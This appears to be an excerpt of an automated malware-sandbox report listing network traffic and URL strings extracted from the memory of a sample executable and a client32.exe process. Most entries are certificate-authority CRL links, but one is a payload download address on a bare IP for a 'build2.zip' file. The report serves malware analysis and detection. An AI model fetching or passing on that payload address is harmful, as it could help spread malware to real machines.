                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 22 Feb 2025 01:46:50 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 915b4e02c9394381-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t3F9zhxsoMYfE9GVVytQFDxKCc%2FRkJqMWEMzxlAIlriLyEn4nAIY2dDYy1n1%2FCrwv93oJp7l8Fd%2FevvW7HW3iCXY0mT%2B2osXS9BdPs3kbwowbJMTekOKCGLt9tguMUBFuBba5cwcm1aaDzaU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: client32.exe, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://%s/testpage.htm
                                Source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: BUenB12U2a.exe, 00000001.00000002.2038640444.0000020E479F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://127.0.0.1
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47ECC000.00000004.00001000.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.198.181/build2.zip
                                Source: BUenB12U2a.exe, 00000001.00000002.2039102712.0000020E47E2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.198.181/build2.zipacted
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234152000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234152000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: BUenB12U2a.exe, 00000001.00000002.2040252451.0000020E48098000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006023599.0000020E48099000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980198885.0000020E47975000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004767997.0000020E48097000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980369030.0000020E4794C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                                Source: BUenB12U2a.exe, 00000001.00000003.2014138896.0000020E45303000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E47787000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009990846.0000020E472DD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011512056.0000020E477C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009164213.0000020E472D7000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009311750.0000020E472DC000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008219589.0000020E472D6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2030217979.0000020E45314000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2027032182.0000020E45314000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E476F6000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2016101945.0000020E45313000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2010988728.0000020E472F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                                Source: BUenB12U2a.exe, 00000001.00000003.2004739588.0000020E47961000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1979624019.0000020E4808E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011542195.0000020E47814000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E4780B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009098255.0000020E47963000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038314579.0000020E47963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.2004767997.0000020E48097000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980369030.0000020E4794C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                                Source: BUenB12U2a.exe, 00000001.00000002.2040252451.0000020E48098000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004767997.0000020E48097000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl&&
                                Source: BUenB12U2a.exe, 00000001.00000003.2007864176.0000020E479E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.1979624019.0000020E4808E000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004832717.0000020E473EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.2007864176.0000020E479E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.2007807265.0000020E47374000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2008036016.0000020E47377000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47332000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2016957728.0000020E47378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crld
                                Source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.1980597679.0000020E48070000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                                Source: BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E47787000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2011512056.0000020E477C8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E476E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006155936.0000020E476F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                                Source: BUenB12U2a.exe, 00000001.00000003.2007864176.0000020E479E2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004705398.0000020E479CD000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2005412957.0000020E479DE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2025886700.0000020E479E3000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2038568839.0000020E479E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlGz
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234152000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRo
                                Source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1725778196.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1733404936.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1728759556.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
